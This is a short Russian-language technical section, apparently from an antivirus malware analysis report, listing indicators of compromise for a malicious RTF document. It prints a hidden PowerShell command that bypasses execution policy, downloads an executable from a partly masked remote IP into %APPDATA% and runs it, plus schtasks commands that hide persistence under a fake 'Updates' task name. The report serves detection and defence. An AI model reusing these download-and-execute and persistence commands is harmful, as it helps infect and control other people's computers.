Техническая информация
- <SYSTEM32>\tasks\updates\pulfeepomudj
- http://19#.#.140.202/fo8wpfwzbc3gexr.exe как %appdata%\ytzkjqhwrp.exe
- ytzkjqhwrp.exe
- %TEMP%\abctfhghgdghgh€.sct
- %APPDATA%\ytzkjqhwrp.exe
- <Текущая директория>\~wrd0000.tmp
- %APPDATA%\pulfeepomudj.exe
- %TEMP%\tmp8516.tmp
- %TEMP%\abctfhghgdghgh€.sct
- %TEMP%\tmp8516.tmp
- <PATH_SAMPLE>.rtf
- http://19#.#.140.202/fO8WPFWzbC3gexr.exe
- '%APPDATA%\ytzkjqhwrp.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://19#.#.140.202/fO8WPFWzbC3gexr.exe','%APPDATA%\yTZKJqHWRp.exe');Start-P...' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\PULfEEpomUDj" /XML "%TEMP%\tmp8516.tmp"' (со скрытым окном)
- '%WINDIR%\syswow64\schtasks.exe' /Create /TN "Updates\PULfEEpomUDj" /XML "%TEMP%\tmp8516.tmp"